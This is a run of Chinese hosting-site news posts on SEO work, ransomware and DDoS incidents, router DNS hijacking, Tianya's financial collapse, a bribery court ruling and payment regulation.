做到极致就是艺术。就关键词这一点而言,你能把整个行业的关键词整理的七七八八吗?你在选取每一个关键词生产内容的时候考虑过是否有机会排名吗?你有把所有生产的关键词整理在一起形成一定联系吗?你定期检查过这些关键词是否获得排名流量吗? 5. 整体思维。长尾词是流量和转化的关键词,没多少人能保证首页那几个词一定能上首页。即使首页的词能上首页,按一个1000指数的词来说,即使上首页又能获取多少流量呢?按专业问答那种霸占一屏的特殊样式来说,点击率只有20%左右,那么普通样式呢? 为什么会这样呢?因为有价值的大词会有百度竞价、百度爱采购、百度智能聚合、百家号以及各种竞品和你抢夺,说是一将功成万骨枯不过分吧?因此如果投入全部资源维护几个关键词风险太大,很可能导致颗粒无收,而长尾策略发展到一定程度是能带动核心词排名的。 6. SEO需要做什么?SEO最痛苦的事情就是每天不知道干嘛,我是谁?我在哪?我要干什么?这些问题简直是灵魂拷问,自从网站的权重起来之后,无名很长一段时间里都在思考人生(上班打卡、下班走人)。那么SEO在工作中到底干什么呢? ①SEO常规职责 关键词挖掘、内容规划、数据监控等等SEO常规职责就不多赘叙了。 ②部分产品经理职责 在没有产品经理的情况下是需要肩负起这个责任的。即使有产品经理,SEO页面的需求也要自己来推动完成的。因此原型设计这个硬核技能是跑不了的。 ③SEO培训 SEO是一个需要协调多个部门的工作,因此让每个部门了解SEO的工作价值是有必要的,能不能让别人积极配合工作,就看你的培训(洗脑)能力了。当然更多的是对部门编辑进行长期培训,让每个编辑独当一面可以把你自己解放出来。。 ④转化 流量的最终目的是为了转化,你需要对网站每一个页面每一个位置的转化能力了如指掌。因为即使是提升0.1%的转化率都是能在业绩上直接体现的。哪一种形式的广告、文案、落地页能获得高转化是需要长期进行A/B测试的。 八、结语 能看到这里的观众老爷无名都表示真诚感谢。每个人都有自己的SEO方法,但是每个人能操盘的项目都有限,所以他山之石可以攻玉,希望作者的小小经验能够给大家带来一点帮助。 作者:无名SEO  QQ:670965634 #### 大英图书馆被勒索软件攻击:数据被盗 要 74 万美元赎金 11 月 21 日消息,英国国家图书馆、世界上最大的图书馆之一 —— 大英图书馆已确认勒索软件攻击,导致内部数据被盗。 10 月下旬,大英图书馆首次披露,它正在经历一场未具体说明的网络安全事件,导致其位于伦敦和约克郡的网站出现“重大技术中断”,进而导致其网站、电话线路和现场服务(例如访客 Wi-Fi)瘫痪。 两周过去了,大英图书馆的网络中断仍在持续。该组织现已确认,此次中断是“以此类犯罪活动闻名的组织”发起的勒索软件攻击造成的。大英图书馆表示,一些内部数据已在网上泄露,“似乎来自我们的内部人力资源档案”。 据 TechCrunch 报道,大英图书馆已被列入 Rhysida 勒索软件团伙的暗网泄露网站名单,该团伙声称对此次网络攻击负责,并威胁要公布从大英图书馆窃取的数据,除非大英图书馆支付赎金 —— 价值超过 74 万美元(IT之家备注:当前约 530.6 万元人民币)的比特币。 Rhysida 勒索软件团伙尚未透露从大英图书馆窃取了多少数据或何种类型的数据,但该团伙共享的数据样本似乎包括就业文件和护照扫描。 当地时间周一,大英图书馆在 X(前身为 Twitter)上分享的一份声明中表示,“没有证据”表明其客户的数据遭到泄露,但建议用户更改密码作为“预防措施”,特别是如果客户的多个服务使用相同的密码。 大英图书馆尚未透露它是如何被入侵的、有多少员工数据被盗,或者是否收到了黑客的通信或赎金要求。 大英图书馆在最新声明中表示,可能需要数周甚至更长时间才能从勒索软件攻击中恢复过来。声明称:“我们预计在未来几周内恢复许多服务,但一些中断可能会持续更长时间。” #### 大量CHATGPT帐号被封 最近,论坛有大量站长反馈自己的CHATGPT帐号登陆不上了,登陆显示被封了,主机吧为此也特地登陆试了下,确实显示被封了。 主机吧还特地咨询了下,卖CHATGPT帐号的,发现他们现在都没有号卖了。 估计都被封完了,有人猜测可能是CHATGPT官网可能大量封禁亚洲的IP的帐号,不过一些也是亚洲注册的帐号并没有被封禁,由此有人推测被封的帐号可能是用了一些机器人注册才导致被封的,因为被封的大多数都是购买的帐号。 主机吧在想,要不要自己去注册一个帐号得了,购买帐号确实不安全。 #### 大量企业网站遭消失在百度,疑似“细雨算法”调整结果 据网友通天流沙飞爆料:7月开始,有个别企业站的排名开始滑落,到7.28号,大量的企业站首页排名前十页没有排名,连公司名称都搜索不到很多都是稳定几年的正规网站,无任何违规行为,最终还是被百度全部拔毛。 你们都做了啥吗?啥也没干,啥也没做;直接首页就给K没了,site都找不到了;公司名字都找不到了... 据此,揣测跟百度此前推出的细雨算法有很大的关系,打击企业B2B行业站给自家熊掌号让路 中小型企业网站被百度打击惩罚本没有什么大惊小怪,因为有百度算法的不断更新,部分企业网站难免出现了降权、K站、拔毛等现象。但如果正常情况下被百度惩罚,一部分的原因因为算法的波动,另一部分原因是因为站长优化手段出现问题,不过也有可能还会有其他的原因。 至于百度“特殊关照熊掌号”,给熊掌号优质流量、导流,顺应百度的政策措施。可以查看下《百度80%搜索流量将全部分发给优质熊掌号》。 这里说明一点:必要时检查网站内容是否出现了问题,内容中严重堆砌关键词是一大禁忌,而且是细雨算法打击b2b站点的对象。 #### 大量刷 CDN 流量的IP段被百度云防护拦截 最近一段时间,国内使用CDN的站长都过得提心吊胆,原因是网站经常会被无缘无故的刷流量,少的一天几G流量没了,多的一天几TB,甚至几十TB的被刷。 主机帮的客户也深受其害,为此主机帮还给客户操作过拦截刷流量的问题。 不过,最近好了,主机帮的一个客户发现网站被刷的流量少了,主机帮查询后发现这些刷流量的IP都被百度云防护当成CC攻击拦截了,不需要自己手动设置拦截规则,黑名单也不需要自己手动添加,看来是百度云防护针对刷流量的问题进行拦截规则升级。 查询CC拦截的IP,基本都是一些网上刷流量的IP,这些IP可能是跟PCDN有关。 从发现大量网站被刷CDN以来,百度云防护其实受影响很小,基本上没有客户反馈过被刷流量,原因可能是因为百度云防护的节点都是BGP节点,不符合刷流量的需求,其次是百度云防护有自动拦截规则,当一个IP请求超过一定频率后,会自动触发拦截规则,让刷流量的无法正常访问,减少后续影响,同时还可以针针URL地址进行限制访问策略,总之,想要刷百度云防护的流量很难。 这里我们推荐使用百度云防护进行安全加速,百度云防护不仅可以加速,还支持安全防御,如各种黑客渗透攻击、DDOS攻击、CC攻击等都可以防御,集成加速、WAF、DDOS防御一体,是一个非常适合网站使用的产品。 #### 大量路由器DNS被篡改 跳转至涉黄涉赌网站 2 月 19 日,据国家互联网应急中心CNCERT监测发现,境内部分用户通过家用路由器访问部分网站时被劫持到涉黄涉赌网站。 经过研究判断,这是一起典型的由互联网地下黑色产业争斗引发的网络安全事件。 发生域名劫持的家用路由器DNS地址被黑客恶意篡改为江苏省镇江市103.85.84.0/24、103.85.85.0/ 24 及扬州市45.113.201.0/ 24 等地址段的多个IP地址。 这些IP地址提供DNS解析服务,并将部分涉黄涉赌类网站域名解析劫持到江苏省镇江市103.85.84.0/ 24 地址段的部分IP地址,最终将用户访问跳转至一博彩类网站“www.mg437700.vip:8888”。 此次事件影响了遍布我国境内全部省份的IP地址 400 万余个,被劫持的涉黄涉赌类域名 190 余个,暂未发现合法的知名商业网站、政府类网站域名被劫持的情况。 对于普通用户来说,建议大家及时修改家用路由器的出厂密码,并检查家用路由器DNS地址是否被恶意篡改。建议更改为运营商提供的DNS服务器地址或114.114.114. 114 等地址。 #### 天啊!吾欢喜的衣橱女装淘宝店宣布关闭! 9月22日消息,近日,淘宝首家销量破亿的女装店铺“吾欢喜的衣橱”宣布关闭,目前,该淘宝店铺共1241万粉丝。 店铺创始人、知名网红张大奕在微博小号上宣布了这一决定,表示确实做不到大家满意,索性就让他停止在这一秒”。 吾欢喜的衣橱”由张大奕与如涵控股创始人冯敏于2014年共同推出,短短两年后,该店铺在2016年双十一”期间成为淘宝首家销量破亿的女装类店铺。 张大奕本人也随着店铺的成功迎来了事业的高峰,并助力如涵控股于2019年在纳斯达克上市,上市两年后,于2021年4月完成私有化并从美股退市。 张大奕表示,将无限期延迟上新"吾欢喜的衣橱”,并计划在下个月进行清仓处理,她强调,关闭淘宝店铺并不意味着她将退出服装行业。 对于接下来的打算,张大奕称,我要顺应市场,且要保证我身边的人、我的企业、我的员工们继续好好生活下去,一起找到下一个目标。” 主机帮查了下,目前“吾欢喜的衣橱”商品已经做清仓处理了。 是什么原因让这样一家五金冠的淘宝店不做了呢? 其实真实原因,还是因为淘宝店的流量大不如前了,很多中小店铺甚至一天都没有一单成交,像“吾欢喜的衣橱”这样的大店成交量也大不如前,应该是赚不到钱,甚至出现亏损,导致关店了,这对于淘宝来说,肯定是巨大损失的,这会不会是淘宝没落的开始呢?! #### 天津注销备案申请表.doc 注销备案申请表 填表须知: 申请表用于存档,请使用A4打印纸,纸张不符或未准确清晰完整填写者,视为无效申请。 注销备案必须提供盖有公章的申请表(个人者附身份证复印件)。 申请表原件邮寄到天津市南开区南门外大街386号天津市通信管理局信息通信管理处806室(邮编:300100)电话:60351158 自收到申请后10个工作日内通过电子邮件方式给予答复。 #### 天津联通IDC负责人张某受贿帮助代理商获取腾讯、淘宝、新浪等客户:被判 3 年 张某,男,1973年出生于北京市,汉族,大学文化,户籍地天津市南开区,住天津市南开区。2019年12月25日因涉嫌职务犯罪经天津市河西区监察委员会决定留置。2020年11月6日被刑事拘留。现羁押于天津市河西区看守所。2007年8月至2017年1月,张某担任原中国网通(集团)有限公司天津市分公司内容应用中心副总经理、中国联合网络通信有限公司天津市分公司(简称“天津联通”)系统集成中心副总经理,主要负责公司IDC业务运营。 12009年至2013年,张某利用其负责IDC业务运营的职务便利,将天津联通客户“千龙网络”、“淘宝网络”和“央视国际”的IDC代理业务交由北京同德恒信信息技术有限公司(简称“北京同德公司”)运营,北京同德公司实际控制人仝某为向张某表示感谢且维持双方合作关系,自2009年至2013年间,陆续给予张某现金人民币共计115万元,该款项均被张某收受并用于其个人日常消费和支出。22007年至2015年,张某利用其负责IDC业务运营的职务便利,将天津联通客户“深圳市腾讯计算机系统有限公司”等公司的IDC代理业务交由北京盛联创业科技有限公(简称“北京盛联公司”)运营。北京盛联公司实际控制人李某为向张某表示感谢且维持双方合作关系,自2007年至2015年间,陆续给予张某现金人民币共计430万元,该款项均被张某收受并用于其个人日常消费和支出。32008年至2015年,张某利用其负责IDC业务运营的职务便利,将天津联通客户“上海巨人”、“上海五海”等多家公司的IDC业务交由上海捷众通讯技术有限公司(简称“上海捷众”)运营。后上海捷众实际控制人丁某为向张某表示感谢且维持双方合作关系,自2008年至2015年间,陆续给予张某现金人民币共计52万元,该款项均被张某收受并用于其个人日常消费和支出。42011年至2015年,张某利用其负责IDC业务运营的职务便利,将天津联通客户“新浪公司”等公司的IDC代理业务交给天津前景软件开发有限公司(简称“天津前景公司”)运营,并将天津联通公司的带宽资源租售给天津龙驰神州网络科技有限公司(简称“天津龙驰公司”)。后天津前景公司和天津龙驰公司的实际控制人孙某为向张某表示感谢且维持双方合作关系,自2011年至2015年,陆续给予张某现金人民币共计145万元,该款项均被张某收受并用于其个人日常消费和支出。2019年12月23日,天津市河西区监察委员会以贪污、巨额财产来源不明罪对张某立案调查,同年12月25日,该委工作人员将张某从天津联通办公地点带至天津市河西区监察委员会调查,并于当日对其采取留置措施。案发后,张某揭发他人犯罪,其家属退缴涉案违法所得人民币742万元。庭审中,张某对起诉书指控的犯罪事实及罪名不表异议,并表示认罪认罚。且有证人仝某、李某、丁某、孙某等人的证言,劳动合同、天津联通出具的主体证明材料,IDC托管合同、营业执照等书证材料,张某的供述和辩解,张某检举揭发材料、扣押通知书、案件来源及抓获经过等其他证明材料等证据证实,足以认定。法院裁决 张某的辩护人对公诉机关指控张某犯非国家工作人受贿罪的定性不持异议,提出案发后张某有坦白、立功、退缴全部赃款、且认罪认罚等情节,建议法庭对张某从轻处罚的辩护意见。天津市河西区人民法院认为,张某身为公司工作人员,利用职务上的便利,非法收受他人钱款共计人民币742万元,为他人谋取利益,数额巨大,其行为已构成非国家工作人员受贿罪。天津市河西区人民检察院指控张某犯非国家工作人员受贿罪,事实清楚,证据充分,罪名成立,法院予以支持。案发后,张某有揭发他人犯罪行为,经查证属实,系立功,依法可以减轻处罚;张某到案后能如实供述自己的犯罪事实,可以从轻处罚;张某自愿认罪并接受处罚,依法可以从宽处罚;张某能退缴全部违法所得,酌情予以从轻处罚。张某的辩护人提出案发后张某有坦白、立功、退缴全部赃款、且认罪认罚等情节,建议法庭对张某从轻处罚的辩护意见,较为客观,法院予以采纳。综合本案上述情节,依照《中华人民共和国刑法》第一百六十三条第一款、第六十七条第三款、第六十八条、第六十四条及《中华人民共和国刑事诉讼法》第二百零一条之规定,判决如下:一、张某犯非国家工作人员受贿罪,判处有期徒刑三年。二、在案追缴的被告人张某违法所得人民币742万元,予以没收。附:本判决引用的法律条文《中华人民共和国刑法》第六十四条犯罪分子违法所得的一切财物,应当予以追缴或者责令退赔;对被害人的合法财产,应当及时返还;违禁品和供犯罪所用的本人财物,应当予以没收。没收的财物和罚金,一律上缴国库,不得挪用和自行处理。第六十七条犯罪以后自动投案,如实供述自己的罪行的,是自首。对于自首的犯罪分子,可以从轻或者减轻处罚。其中,犯罪较轻的,可以免除处罚。被采取强制措施的犯罪嫌疑人、被告人和正在服刑的罪犯,如实供述司法机关还未掌握的本人其他罪行的,以自首论。犯罪嫌疑人虽不具有前两款规定的自首情节,但是如实供述自己罪行的,可以从轻处罚;因其如实供述自己罪行,避免特别严重后果发生的,可以减轻处罚。第六十八条犯罪分子有揭发他人犯罪行为,查证属实的,或者提供重要线索,从而得以侦破其他案件等立功表现的,可以从轻或者减轻处罚;有重大立功表现的,可以减轻或者免除处罚。第一百六十三条公司、企业或其他单位的工作人员利用职务上的便利,索取他人财物或者非法收受他人财物,为他人谋取利益,数额较大的,处五年以下有期徒刑或者拘役;数额巨大的,处五年以上有期徒刑,可以并处没收财产。公司、企业或其他单位的工作人员在经济往来中,违反国家规定,收受各种名义的回扣、手续费,归个人所有的,依照前款的规定处罚。国有公司、企业或其他国有单位中从事公务的人员和国有公司、企业或其他国有单位委派到非国有公司、企业或其他单位从事公务的人员有前两款行为的,依照本法第三百八十五条、第三百八十六条的规定定罪处罚。《中华人民共和国刑事诉讼法》第二百零一条对于认罪认罚案件,人民法院依法作出判决时,一般应当采纳人民检察院指控的罪名和量刑建议,但有下列情形的除外:(一)被告人的行为不构成犯罪或者不应当追究其刑事责任的;(二)被告人违背意愿认罪认罚的;(三)被告人否认指控的犯罪事实的;(四)起诉指控的罪名与审理认定的罪名不一致的;(五)其他可能影响公正审判的情形。人民法院经审理认为量刑建议明显不当,或者被告人、辩护人对量刑建议提出异议的,人民检察院可以调整量刑建议。人民检察院不调整量刑建议或者调整量刑建议后仍然明显不当的,人民法院应当依法作出判决。 #### 天涯可能凉了,网站彻底打不开了! 去年有报道过,天涯创始人被限制高消费的情况,没想到短短5个月时间,天涯就凉了,目前网站已经彻底打不开了。 4月1日愚人节这一天,天涯论坛突然发布公告称:天涯论坛做技术升级和数据重构,在此期间平台将无法访问,不过这都一个月过去了,还是打不开,做过网站的同学都知道,网站一个月打不开的话,搜索引擎的收录是会清0的,不过目前天涯似乎没有这个问题,估计是天涯的权重实在太高了,属于国内第一批网站的行列。 #### 天涯社区App重新上架应用商店了 根据最新的消息,天涯社区App已经重新上架了苹果App Store以及部分安卓应用商店,但是目前版本号仍然是1年前的7.3.0。虽然应用已经可以下载,但在实际使用过程中,用户可能遇到无法注册账号、登陆账号的问题,选择注册账号时会提示"未能找到使用指定主机名的服务器",在选择"浏览进入"模式进入应用后,也可能无法显示任何内容,显示"没有取得数据,请求刷新"。 天涯社区自去年4月1日被暂停访问以来,至今还没有恢复。不过,根据官方公告,天涯社区正在积极筹备恢复访问,计划在未来的两个月内,也就是5月1日前恢复天涯社区的访问。为了实现这一目标,天涯社区正在采取引入战略投资、恢复广告业务、启动社交电商平台以及大力开展会员增值服务等多种方式筹措资金。 恢复访问后,天涯社区将启用新的国际域名,并进一步加强面向海外华人的中文网络社区服务,以进一步巩固其"全球华人网上家园"的地位。此外,天涯社区还计划启动以天涯社区最初的域名为品牌的"全球旅行与时尚消费社交平台",提供会员制电商服务,结合海南自由贸易港的供应链优势,打造线上版的Costco,该平台1.0版预计将在1个月内推出。 #### 天涯社区可能复活,创始人邢明首度回应:不会放弃,用户数据不会丢 5 月 27 日消息,天涯社区曾经是中文互联网最具影响力的网站之一,也是许多初代网民的青春回忆。但自从 2023 年 4 月 25 日起,这个成立于 1999 年的老牌论坛就无法访问了,引发了网友们的热议和怀念。 天涯社区的创始人之一、前董事长邢明今日在社交平台上首度回应了广大网友关心的问题,称这是因为资金问题导致的暂时停摆,并没有放弃恢复网站的希望。他还保证,天涯社区的数据不会丢失,会尽力保留网友们在天涯上发过的帖子、博文和神帖。 邢明称:“数据不会丢失,天涯从未放弃。”他表示:“原来我们只是想低调地休整一段时间,筹集到资金再把它恢复起来,但是没想到网友的反应这么的热烈。”刑明还称:将把数据的恢复与保存放在第一位,与政府、电信合作沟通,确保网友们的“回忆”能够留存下来。 IT之家注意到,为了重启天涯社区,另一位创始人之一宋铮发起了“七天七夜,重启天涯”直播义卖活动,希望通过直播带货的方式,筹集到 300 万的资金支付电信机房的费用,活动得到了大量网友和天涯前员工的支持和参与。据悉,重启天涯直播义卖将于 5 月 28 日 20 点开始,连播七天。 谈及重启天涯活动,邢明坦言,“我没有想到网友们有如此大的热情,出乎我们的意料,这对我们而言是一种激励,同时,我们也感到自责,没有为大家维护好平台。”邢明补充道,“我们对未来充满信心,没有想过放弃。”值得一提的是,有一些员工建议是不是效仿俞敏洪做直播带货,刑明表示,天涯的特性有点不一样,包括他个人也不是这个特性。 #### 天涯社区被申请破产 根据天眼查App最新消息,天涯社区网络科技股份有限公司(以下简称“天涯社区”)在2月26日被曝新增一则破产审查案件,此次申请的发起人是张鑫,而负责此次案件审查的法院为海南省海口市中级人民法院。 根据公开的风险信息,该公司目前存在多条被执行人信息,被执行的总金额已超过1051万元。除此之外,该公司还面临着多个限制消费令和股权冻结信息的压力。 天涯社区是一个于1999年创立的全球华人网上社区,旨在打造全球华人内容创作和知识分享社交平台。该社区注册用户超过1.3亿,月覆盖用户超过2.5亿,拥有高质量用户群体,具有独特的开放、包容、充满人文关怀的特色,备受国内网民和全球华人的推崇。 2023年4月1日,天涯社区发布公告称,将进行技术升级和数据重构,期间暂停访问服务。5月27日,因资金流动性困难,官方宣布暂停访问服务。 面对经营困难,天涯社区采取了多种自救措施,试图扭转局面,天涯社区尝试通过直播、电商等方式进行转型,利用现有的品牌影响力和用户基础,探索新的盈利模式。 尽管实施了自救措施,天涯社区的未来发展仍然充满不确定性。 #### 天涯社区要凉了吗,创始人邢明被限制高消费 11 月 3 日消息,信息显示,近日天涯社区网络科技股份有限公司新增多项被执行信息,被执行总金额已达 1.39 亿元。同时,天涯社区法定代表人、创始人邢明已被限制高消费。 天涯社区网络科技股份有限公司成立于 1999 年,注册资本为 9300 万元,对外投资有 14 家企业,其中 4 家已成被执行人。 天涯社区曾与猫扑被称为“BBS 界双子星”的社交网站,曾一手捧红了芙蓉姐姐、当年明月等用户,后来还与豆瓣、晋江争奇斗艳。 据天涯社区官网简介显示,目前,天涯社区注册用户超过 1.3 亿,月覆盖用户超过 2.5 亿。天涯社区提供论坛、部落、博客、问答、文学、相册、个人空间等服务。拥有天涯杂谈、娱乐八卦、情感天地等人气栏目,以及关天茶舍、煮酒论史等高端人文论坛。 官网还介绍,天涯社区公司创始人邢明,海南文昌人,出生于河北沧州,1991 年毕业于中山大学中文系,2009 年获长江商学院工商管理硕士学位,2016 年获清华大学五道口金融学院工商管理硕士学位,是中国早期互联网创业者之一。 2019 年 3 月 27 日,据网信海南消息,海南省互联网信息办公室业务处室会同海南省“扫黄打非”工作小组办公室就传播色情低俗信息问题约谈天涯社区负责人,要求其切实履行好互联网信息服务提供者主体责任,立即开展自查自纠,全面清理色情低俗信息,切实维护良好网络生态。 2019 年 4 月 17 日,停牌了两年多之久的天涯社区从新三板摘牌。 2021 年 4 月 23 日,工信部通报下架天涯社区等 90 款侵害用户权益 App。 2021 年 11 月,海南省互联网信息办公室通报天涯社区 App 存在违法违规收集使用个人信息的行为。 主机吧去看了下,天涯社区目前还是有些人气的,只是相对于抖音这类平台,差距不是亿点点,希望天涯挨过危机,这是国内为数不多仅存的社区论坛网站了。 #### 天涯社区难翻身了!欠债1.1亿 每日经济新闻消息,6月19日,启信宝APP显示,近日,天涯社区网络科技股份有限公司新增一条终本案件信息,未履行金额达1.1亿,涉及海口农村商业银行股份有限公司与天涯社区网络科技股份有限公司等金融借款合同纠纷一案。 天涯社区此前已因此案被限制高消费、股权冻结等。值得注意的是,终本案件是指法院的执行案件,由于被执行人没有可供执行的财产,而裁定终止本次执行程序。 5月28日晚,一场名为“重启天涯”的直播义卖拉开了帷幕。在组织者前天涯社区执行总编辑宋铮的设想里,这场直播将持续7天7夜,希望能够给天涯社区筹集300万元,用以支付电信机房费用,恢复天涯社区的正常访问。 这是一场由前员工和老用户自发组织的志愿活动,目的只有一个,挽救成立24年的天涯。 开播三个小时,在线观看人数最高徘徊在1000人左右。截至5月28日开播前10分钟,“重启天涯”的抖音账号粉丝数仅1.5万人,累计发布了50余条视频,除个别外,绝大多数视频点赞不足200,评论也寥寥无几。 从5月28日20时到6月3日20时许,七天七夜的直播落下帷幕,但各项数据并不乐观。 截至6月3日18时,该直播间的成交单量为6451单,销售总额约36.1万元,预估利润为8.43万元,加上打赏收入6.56万元,共14.99万元。 截至6月3日20时许,该直播间的点赞量为26.5万,在线观众为553人。 天涯欠海南电信服务费达千万 曾经的天涯,号称“全球最大的中文互联网社区”,《鬼吹灯》《明朝那些事儿》《滚蛋吧肿瘤君》等现象级网络文学作品诞生于此,芙蓉姐姐、宁财神、天下霸唱、十年砍柴等人从这里发迹。无论是情感八卦,还是严肃历史,天涯网友谈天说地,盖起一层层高楼。 不过,随着移动端的兴起,博客、微博、短视频等形式逐渐取代了BBS论坛,天涯等一系列红极一时的社区也逐渐走向衰落。 在5月27日的公开回应中,天涯社区也为自己“重生”后的路线做好了规划:在扛起“全球华人网上家园”的同时,聚焦移动端;基于天涯用户的大数据累积,推出数字人助理或数字分身服务;以及提供会员制社交电商服务。 另外,天涯社区还回应了暂停访问的原因:由于资金流动性困难,这几年累计拖欠的电信IDC费用已到了最后无法协调协商的状态,加上我们也发现了一些平台自身的技术问题需改进,需要进行技术升级、数据重构及产品瘦身等,这将大幅降低电信费用及优化用户体验,有利于后续的可持续发展。因此,天涯社区无奈暂停了访问服务。 #### 天涯论坛要重启了?:预计 5 月 1 日前恢复访问 根据最新的信息,天涯社区已经公布了其重启的进展。他们计划在未来两个月内,通过市场化方式筹集不超过1000万元的资金,专项用于恢复天涯社区的访问以及持续运营。为了实现这一目标,他们将采取引入战略投资、恢复广告业务、启动社交电商平台以及大力开展会员增值服务等多种方式筹措资金。 天涯社区预计在5月1日前恢复访问,届时将启用新的国际域名tianya.net。同时,他们将启动以天涯社区最初的tianyaclub.com域名为品牌的“全球旅行与时尚消费社交平台”,提供会员制电商服务,结合海南自由贸易港的供应链优势,打造线上版的Costco,该平台1.0版将在1个月内推出。 此外,天涯社区也计划从现在开始发展一批高级会员,在恢复访问后的天涯社区平台上开辟天涯神贴付费专区,提供更为“全面、完整、原汁原味”的天涯神贴服务,并动态更新。对于用户关心的原创作品和数据保存问题,天涯社区也将推出一对一专享数据下载与存储服务。 公告称,近日,天涯因一位员工欠薪被申请破产审查的案件,再次引发广泛舆论关注。该案件是公司遇到资金困难后面临的正常法律诉讼,并不会对天涯重启构成实质性的影响。公司也在努力地进行债务重组,有信心将公司的债务总额降到 1 个亿以内。 #### 天猫消费者交易的整个过程中在什么情况下可以申请仅退款的选项? 淘宝售后服务专员认证考试题 天猫消费者交易的整个过程中在什么情况下可以申请仅退款的选项? 正确答案:已付款   #### 天蚕土豆怒斥RNG:质疑买外围,称其膨胀得不配赢 10月22日 消息:S8 全球总决赛八强淘汰赛已拉下帷幕,这次的比赛结果可以说是相当玄幻了,身为小组赛头名的RNG竟然因为轻敌、膨胀最后输给了外围赛上来的G2,粉丝们无法接受,纷纷直呼太失望。而知名小说家天蚕土豆也在赛后发表了过激言论,不但在微博直接对RNG教练爆粗口,还质疑RNG买外围,称其膨胀得不配赢。 对于天蚕土豆的言论,网友议论纷纷。有网友认为天蚕土豆的态度有点过了,虽然大家对这次比赛结果都很失望,但他的行为过激了,称其不过是借机蹭热度罢了。对此,天蚕土豆回应称:他之所以这么生气,是因为打的太烂了。他称自己一直有看RNG比赛,且三支队伍中最支持的也是RNG。但这次真的太让人失望了。不少网友表示同意天蚕土豆的说法,膨胀,轻敌确实是RNG失败的主要原因。 值得注意的是,前《LOL》视频的知名制作人堂姐伊芙蕾雅也发表了相关言论。其微博称:骄兵必败,小说里男主都是这样打败对手的,注定RNG不是主角! #### 太强了!Cloudflare 成功防御住了有史以来最大 HTTPS DDoS 攻击:每秒 1530 万次请求 5 月 7 日消息,据 Neowin 报道,Cloudflare 近期透露,已成功应对来自多个国家地区的有记录以来最大的 HTTPS DDoS 攻击之一。该公司表示,该僵尸网络每秒发出 1530 万次请求 (rps),使其成为其目睹的针对客户的最大 HTTPS DDoS 攻击之一。 Cloudflare 表示,僵尸网络攻击的目标是一家加密 launchpad 公司,旨在将加密项目与投资者联系起来。客户在 Cloudflare 的专业计划中,并在攻击进行的不到 15 秒内受到 Cloudflare 的保护。其他 Cloudflare 客户也会自动受到保护,无需采取任何措施。 Cloudflare 遇到的最大攻击是去年 8 月报告的,当时一个僵尸网络执行了 1720 万 rps DDoS 攻击,但这是使用 HTTP 流量而不是最新攻击中使用的 HTTPS 流量。Cloudflare 表示,HTTPS 的使用使攻击者和试图减轻攻击的受害者的成本更高。 Cloudflare 指出,这种攻击主要来自数据中心,并且它注意到更多的攻击总体上来自云计算 ISP,而不是住宅网络 ISP。该僵尸网络涉及 6000 个独特的僵尸程序,起源于全球 112 个国家和地区。托管机器人最多的国家地区包括印度尼西亚、俄罗斯、巴西、印度、哥伦比亚和美国。攻击来自 1300 多个网络,其中包括 Hetzner Online GmbH、Azteca 等顶级网络。 #### 太惨了!niconico被网络攻击两个月才恢复服务 8 月 6 日消息,niconico 动画昨日宣布,niconico 动画恢复服务。母公司 KADOKAWA(角川)官方公布了此前遭网络攻击的信息泄露情况,确认共有 25 万 4241 人的个人信息泄露。 自6 月 8 日遭受网络攻击后,niconico 动画弹幕网站服务中断无法访问,黑客组织 BlackSuit 宣称为这起网络攻击事件负责。 大型安全公司推测,黑客通过网络钓鱼等攻击窃取了 Dwango(多玩国、niconico 动画所属公司)员工的账户信息,通过这些账户信息侵入了公司内部网络。 通信制高中“N 高等学校”、“S 高等学校”等在校生和毕业生的姓名、地址、学历等信息外泄,部分与多玩国及其关联公司的交易方、多玩国全体员工的个人信息等也被泄露。 #### 太惨了!华为云连域名注册服务都没有了! 众所周知,华为是一家被美国制裁的公司,只要涉及到美国的相关东西,华为都无法使用。 这不,现在连域名注册服务都无法使用了,以下是华为云的公告: 意思是说因业务策略调整,域名注册服务Domains于2025年7月26日停售了,这里面是真业务调整呢?还是因为制裁的原因无法注册域名了呢? 主机帮更倾向于后者,原因是一家做云的服务商,怎么可能不知道域名业务的重要性,虽然现在域名注册业务没有以前那么重要了,但对于做公有云的服务商来了,这是必要的,有了域名注册服务,你就可以给客户提供一条龙服务,而不需要考虑第三方域名管理因素,可以让域名解析跟CDN、OSS云储存等产品结合,一键操作。这域名注册一停,以后你的客户想要用的产品,还得单独到别的域名服务商购买,这里面的影响还是很大的。 这里最怕的应该是美国连华为自己的域名都给你停了,那就危险了,目前来说,还做不到这一步。 #### 太惨,卢松松博客又挨文章版权起诉了 最近,无聊看看卢松松博客,发现他又挨起诉了,原因是N年前的一篇文章,被某公司找上门来起诉了。 所以,大家别随意在网站转文章了,没准人家做了版权的,转发后面临索赔风险。 #### 央行出手!二维码支付将每天最高500元! 对于各位小伙伴来讲,微信支付宝扫码付款已经成为生活的常态。周末坐车、购物、吃饭基本上“手机在手,买单方便”。然而你知道吗?用支付宝、微信等应用扫码付款将正式迎来额度限制。 日前,人民银行发布《中国人民银行关于印发的通知》(下简称《通知》),配套印发了《条码支付安全技术规范(试行)》和《条码支付受理终端技术规范(试行)》,自2018年4月1日起实施。 何为条码支付? 据央视财经 条码包括我们常用的二维码,作为一种可以完全暴露的图形载体,通常显示在各种媒介上,包括印刷材料或者是网页界面。它比普通条形码具有更多的优势,如数据存储量大、纠错能力强、反应更敏捷等。 所谓的条码支付,是指银行或支付机构应用条码技术,实现收款人、付款人之间货币资金转移的业务活动,包括付款扫码和收款扫码两种方式。 在我国,近年来随着智能手机不断普及,以二维码为代表的条码与智能手机结合,发展成为一种新的承载和转换数据方式。这种方式被银行业金融机构或非银行支付机构使用后,探索出一种新的支付模式,可将业务从线上扩展到线下支付。 出门打车,掏出手机扫一扫车上的二维码,轻松支付车费;下馆子吃饭,手机上的二维码被收银员扫码枪扫了后,立马埋单走人……扫码支付手段,已经飞入寻常百姓家。 条码支付便民,但问题不少 近年来条码支付业务快速发展,在小额、便民支付领域显现出门槛低、使用便捷的优势,市场份额持续增长,成为移动支付发展的重要体现形式。 同时,条码支付的技术实现方式和业务风险相对传统银行卡支付具有其特殊性,部分市场机构在业务开展中也存在扰乱公平竞争秩序、支付风险防范不到位等问题。 央行条码支付业务规范发布对扫码支付进行限额管理 据央视财经 12月27日,中国人民银行正式发布条码支付业务规范和技术规范等文件,明确支付机构提供条码支付服务,必须持牌经营,同时将根据风险防范能力的不同,对扫码支付进行限额管理。 微信钱包扫描静态条码支付 单日支付上限不超过500元 由于静态条码(如事先贴在墙上的二维码)易被篡改或变造,易携带木马或病毒,央行规定,使用静态条码进行支付的,风险防范能力为D级,无论使用何种交易验证方式,同一客户银行或支付机构单日累计交易金额应不超过500元。 